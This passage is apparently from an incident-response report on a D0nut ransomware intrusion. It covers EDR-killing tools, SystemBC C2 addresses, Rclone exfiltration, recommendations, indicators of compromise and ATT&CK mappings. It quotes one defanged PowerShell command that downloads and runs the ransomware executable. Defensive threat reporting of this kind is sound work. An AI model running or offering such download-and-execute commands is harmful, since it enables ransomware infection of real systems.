As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders: 

• C:\temp\ 
• C:\ProgramData\ 

Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.   

The threat actor took additional measures by appending registry configurations to a pre-existing GPO that would disable detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\directories. The below configuration was applied across all hosts present on the compromised domain:  

Command and Control

Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.  

SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.  

Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server: 

• 85.239.52[.]7  
• 194.87.111[.]29  

Exfiltration  

Rclone, an open-source file cloud storage program heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\User\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.  

Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.  

Impact

Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.  

Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.   

The ransomware was downloaded and executed via the following PowerShell command: 

powershell.exe iwr -useb hxxp[:]//ix[.]io/4uD0 -outfile xd.exe ; .\xd.exe debug defgui 

In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (however it is likely that the folders may vary from case to case and the threat actor uses any folders in the root of C:\): 

• C:\Temp\ 
• C:\ProgramData\ 
• C:\storage\ 
• C:\StorageReports\

During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program: 

A fairly unique ransom note is dropped after the encryption process in the form of a HTML file named readme.html: 

Recommendations  

1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.  

2. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.  

3. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.     

4. Monitor firewalls for anomalous spikes in data leaving the network. 

5. Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations. 

If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected]. 

Indicators Of Compromise  

IOC Value	Indicator Type	Description
hxxp[:]//ix[.]io/4uD0	URL	Hosted ransomware executable – xd.exe
85.239.52[.]7:4001	IP:PORT	SystemBC C2
194.87.111[.]29:4001	IP:PORT	SystemBC C2
83.149.93[.]150	IP Address	SFTP server used for data exfiltration
eb876e23dbbfe44c7406fcc7f557ee772894cc0b	SHA1	Ransomware executable – wxd7.exe
d4832169535e5d91b91093075f3b10b96973a250	SHA1	SystemBC executable – explorer.exe
550cd82011df93cc89dc0431fa13150707d6aca2	SHA1	Used to kill AV and EDR processes – def.exe
f6f11ad2cd2b0cf95ed42324876bee1d83e01775	SHA1	Used to kill AV and EDR processes – RTCore.sys
C:\ProgramData\xd.exe C:\temp\xd.exe C:\storage\xd.exe C:\Temp\wxd7.exe C:\ProgramData\wxd7.exe C:\storage\wxd7.exe C:\StorageReports\wxd7.exe	File Path	Ransomware executable
C:\ProgramData\explorer.exe	File Path	SystemBC
C:\StorageReports\Scheduled\explorer.exe	File Path	Rclone
C:\ProgramData\def.exe C:\temp\def.exe C:\ProgramData\d.dll C:\temp\d.dll	File Path	Used to kill AV and EDR processes

MITRE ATT CK®

Tactic	Technique	ID	Description
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	PowerShell was utilized to execute malicious commands
Execution	System Services: Service Execution	T1569.002	Cobalt Strike remotely created temporary services to execute its payload
Execution	System Services: Service Execution	T1569.002	PsExec creates a service to perform it’s execution
Persistence	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder	T1547.001	SystemBC created a run key entry to establish persistence.
Privilege Escalation	Process Injection: Portable Executable Injection	T1055.002	def.exe achieved privilege escalation through process injection
Defense Evasion	Impair Defenses: Disable or Modify Tools	T1562.001	The threat actor modified a legitimate GPO to disable Windows Defender functionality
Defense Evasion	Impair Defenses: Disable or Modify Tools	T1562.001	def.exe and d.dll were deployed to terminate EDR and AV services
Lateral Movement	SMB/Admin Windows Shares	T1021.002	Cobalt Strike targeted SMB shares for lateral movement
Lateral Movement	SMB/Admin Windows Shares	T1021.002	PsExec uses SMB shares to execute processes on remote hosts
Lateral Movement	Remote Services: Remote Desktop Protocol	T1021.001	RDP was used to establish sessions to other hosts on the network
Command and Control	Proxy: External Proxy	T1090.002	SystemBC communicates with its C2 server via proxies
Exfiltration	Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	T1048.002	The threat actor exfiltrated data to an SFTP server
Impact	Inhibit System Recovery	T1490	Volume shadow copies for a file server were deleted prior to encryption from the ransomware
Impact	Data Encrypted for Impact	T1486	Ransomware was deployed to the estate and impacted both servers and user workstations
Impact	Data Encrypted for Impact	T1486	Virtual machines hosted on an ESXi server were encrypted at the hypervisor level